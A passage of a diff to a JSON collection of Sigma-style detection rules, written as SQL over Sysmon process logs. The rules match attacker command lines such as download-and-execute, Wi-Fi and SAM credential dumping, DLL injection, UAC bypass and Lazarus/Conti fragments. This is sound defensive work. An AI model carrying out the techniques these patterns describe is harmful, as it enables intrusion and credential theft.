CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_susp_download_office_domain.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "status": "experimental", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Command Line Execution with Suspicious URL and AppData Strings", - "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", "status": "test", - "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.command_and_control", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1105" + "attack.t1059.001" ], "falsepositives": [ - "High" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_http_appdata.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Audio Capture via PowerShell", - "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", + "id": "42b1a5b8-353f-4f10-b256-39de4467faff", "status": "test", - "description": "Detects audio capture via PowerShell Cmdlet.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "author": "Andreas Hunkeler (@Karneades), oscd.community", "tags": [ - "attack.collection", - "attack.t1123" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_audio_capture.yml" + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" }, { - "title": "Potential Product Reconnaissance Via Wmic.EXE", - "id": "15434e33-5027-4914-88d5-3d4145ec25a9", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Nasreddine Bencherchali", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_product.yml" + "filename": "proc_creation_win_hktl_pypykatz.yml" }, { - "title": "Potential SquiblyTwo Technique Execution", - "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", - "status": "test", - "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", - "author": "Markus Neis, Florian Roth", + "title": "Read Contents From Stdin Via Cmd.EXE", + "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", + "status": "experimental", + "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1047", - "attack.t1220", "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" + "filename": "proc_creation_win_cmd_stdin_redirect.yml" }, { - "title": "Potential Suspicious Activity Using SeCEdit", - "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", "status": "experimental", - "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", - "author": "Janantha Marasinghe", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.discovery", - "attack.persistence", "attack.defense_evasion", - "attack.credential_access", "attack.privilege_escalation", - "attack.t1562.002", - "attack.t1547.001", - "attack.t1505.005", - "attack.t1556.002", - "attack.t1562", - "attack.t1574.007", - "attack.t1564.002", - "attack.t1546.008", - "attack.t1546.007", - "attack.t1547.014", - "attack.t1547.010", - "attack.t1547.002", - "attack.t1557", - "attack.t1082" + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ - "Legitimate administrative use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_secedit_execution.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Suspicious Regsvr32 Execution With Image Extension", - "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", - "author": "frack113", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_image.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Use Short Name Path in Command Line", - "id": "349d891d-fef0-4fe4-bc53-eee623a15969", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1036.005" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "Query Usage To Exfil Data", - "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", - "status": "experimental", - "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_query_session_exfil.yml" + "filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ + "attack.g0032", "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ "attack.collection", - "attack.t1560" + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "Deleted Data Overwritten Via Cipher.EXE", - "id": "4b046706-5789-4673-b111-66f25fe99534", - "status": "experimental", - "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", - "author": "frack113", + "title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'CIPHER.EXE' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 